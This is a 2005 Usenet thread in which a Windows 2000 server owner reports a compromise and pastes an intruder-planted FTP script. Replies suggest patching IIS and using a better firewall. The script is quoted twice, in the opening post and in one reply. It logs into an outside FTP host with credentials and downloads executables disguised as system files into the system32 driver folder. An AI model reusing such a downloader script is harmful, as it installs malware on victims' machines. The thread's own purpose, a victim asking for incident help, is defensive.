Security Breach

I am running windows 2k adv server, running iis , cold fusion, sql
server 2k, zone alarm file, netopia cayman 5300 series router and
remote admin. I just noticed a file C:\MSSQL_Script.txt which is
requesting ftp access to download some malicious file.. My Questions

I rebuilt my PC from a backup but the file just re-appeared again.
1) Does any know how they might have gotten in. i only have port
80,443,20,21 opened
2) how do hacker schedule jobs. Cos i didn notice a recp.exe program
requesting access also.
3) Can some help with the next steps i need to take.

Thanks

content of file

open ftp.cybton.com
USER mkeoma uvrlSN
USER mkeoma uvrlSN
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
open ftp.cybton.com
USER eazy VEDgFT
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit

Re: Security Breach

"quest" wrote in message
news:1120010819.796186.225260@z14g2000cwz.googlegroups.com.. .
> I am running windows 2k adv server, running iis , cold fusion, sql
> server 2k, zone alarm file, netopia cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting ftp access to download some malicious file.. My Questions
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does any know how they might have gotten in. i only have port
> 80,443,20,21 opened
> 2) how do hacker schedule jobs. Cos i didn notice a recp.exe program
> requesting access also.
> 3) Can some help with the next steps i need to take.
>
> Thanks
>
> content of file
>
> open ftp.cybton.com
> USER mkeoma uvrlSN
> USER mkeoma uvrlSN
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
> open ftp.cybton.com
> USER eazy VEDgFT
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
>

I couldn't see exact specifications, but that router doesn't look to be much
of a firewall, probably only SPI, and Zone Alarm is a software based SPI
firewall with its own limitations. So you need to make sure either all
applications facing the internet (ie those on ports 80, 443, 20, and 21) are
fully patched, or need to look at a firewall with Intrusion Detection
capabilities (ie Netscreen/Sonicwall/Fortinet).

Re: Security Breach

quest wrote on 28 Jun 2005 19:06:59 -0700:

> I am running windows 2k adv server, running iis , cold fusion, sql
> server 2k, zone alarm file, netopia cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting ftp access to download some malicious file.. My Questions
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does any know how they might have gotten in. i only have port
> 80,443,20,21 opened

Best guess, IIS. Have you got it fully patched? Are you running any of the
add-on tools like URLScan or IISLockDown? I assume that you're using the IIS
FTP service too, that's a possible injection point and personally I wouldn't
run that software on my system.

And why oh why are you running ZoneAlarm on what is obviously a public
server. If you got enough cash to run 2K Advanced Server on it, surely you
can shell out for a decent hardware firewall.

Dan